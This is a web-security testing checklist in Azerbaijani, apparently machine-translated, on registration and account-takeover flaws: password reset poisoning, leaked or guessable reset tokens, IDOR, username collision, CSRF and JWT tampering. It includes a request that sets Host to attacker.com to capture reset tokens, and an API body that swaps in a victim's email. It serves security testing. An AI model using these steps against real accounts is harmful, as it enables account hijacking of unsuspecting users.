Registration & Takeover Vulnerabilities

Dublikat Qeydiyyat

  • Mövcud istifadəçi adından istifadə edərək yaratmağa çalışın

  • E-poçtun dəyişdiyini yoxlayın:

Username Enumeration

Tətbiq daxilində istifadəçi adının nə vaxt qeydiyyatdan keçdiyini anlaya bildiyinizi yoxlayın.

Parol Siyasəti

İstifadəçi yaratmaq parol siyasətini yoxlayın (zəif parollardan istifadə edə bildiyinizi yoxlayın). Bu halda siz etimadnaməsini bruteforce etməyə cəhd edə bilərsiniz.

E-maili dəyişmək

Qeydiyyatdan keçdiyiniz zaman e-poçtu dəyişdirməyə çalışın və bu dəyişikliyin düzgün şəkildə təsdiqlənib-keçilmədiyini yoxlayın və ya onu ixtiyari e-poçtlara dəyişə bilər.

Daha çox yoxlama

  1. Birdəfəlik e-poçtlardan istifadə edə bildiyinizi yoxlayın

  2. Uzun parol (>200) DoS-ə gətirib çıxarır

  3. Hesabın yaradılması zamanı tarif limitlərini yoxlayın

  4. username@burp_collab.net istifadə edin və callback təhlil edin

Password Reset Takeover

Password Reset Token Leak Via Referrer

  • E-poçt ünvanınıza parol sıfırlamasını tələb edin

  • Parol sıfırlama linkinə klikləyin

  • Parolu dəyişməyin

  • İstənilən 3-cü tərəf saytlarına klikləyin (məsələn: Facebook, twitter)

  • Burp Suite proxy-də sorğuya müdaxilə edin

  • İstinad başlığının parol sıfırlama nişanı sızdığını yoxlayın.

Password Reset Poisoning

  1. Burp Suite-də parol sıfırlama sorğusuna müdaxilə edin

  2. Burp Suite-də aşağıdakı başlıqları əlavə edin və ya redaktə edin: Host: attacker.com, X-Forwarded-Host: attacker.com

  3. Sorğunu dəyişdirilmiş başlıqla yönləndirin http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com

  4. Host başlığına əsaslanan parol sıfırlama URL-ni axtarın: https://attacker.com/reset-password.php?token=TOKEN

E-poçt Parametri ilə Parolun Sıfırlanması

API Parametrlərində IDOR

  1. Təcavüzkar öz hesabı ilə daxil olmalı və Parolun dəyişdirilməsi funksiyasına keçməlidir.

  2. Burp Suite-i işə salın və sorğunu kəsin

  3. Onu repeater nişanına göndərin və parametrləri redaktə edin:

    powershell POST /api/changepass [...] ("form": {"email":"[email protected]","password":"securepwd"})

Zəif Parol Sıfırlama Tokeni

Parol sıfırlama nişanı təsadüfi yaradılmalı və hər dəfə unikal olmalıdır. Tokenin müddətinin bitdiyini və ya həmişə eyni olub olmadığını müəyyən etməyə çalışın, bəzi hallarda nəsil alqoritmi zəifdir və onu təxmin etmək olar. Aşağıdakı dəyişənlər alqoritm tərəfindən istifadə edilə bilər.

  • Vaxt möhürü

  • İstifadəçi adı

  • İstifadəçinin E-poçtu

  • Ad və Soyad

  • Doğum tarixi

  • Kriptoqrafiya

  • Yalnız nömrə

  • Kiçik işarə ardıcıllığı ( [A-Z,a-z,0-9] arasındakı simvollar)

  • Tokenin təkrar istifadəsi

  • Tokenin istifadə müddəti

Sızan Parol Sıfırlama Tokeni

  1. Xüsusi e-poçt üçün API/UI istifadə edərək parol sıfırlama sorğusunu işə salın, məsələn: [email protected]

  2. Server cavabını yoxlayın və resetToken olub olmadığını yoxlayın

  3. Sonra https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL] kimi URL-də işarədən istifadə edin.

Password Reset Via Username Collision

  1. Sistemdə qurbanın istifadəçi adı ilə eyni olan istifadəçi adı ilə, lakin istifadəçi adından əvvəl və/və ya sonra boşluqlar qoyulmaqla qeydiyyatdan keçin. məsələn: "admin "

  2. Zərərli istifadəçi adınızla parol sıfırlamasını tələb edin.

  3. E-poçtunuza göndərilən işarədən istifadə edin və qurban parolunu sıfırlayın.

  4. Yeni parol ilə qurban hesabına qoşulun.

Account Takeover

  1. CSRF üçün payload yaradın, məsələn: “Parol dəyişikliyi üçün avtomatik təqdim edilən HTML forması”

  2. Payloadı göndərin

Account Takeover via JWT

JSON Web Token istifadəçinin autentifikasiyası üçün istifadə edilə bilər.

  1. JWT-ni başqa İstifadəçi ID/E-poçt ilə redaktə edin

  2. Zəif JWT imzasını yoxlayın

Last updated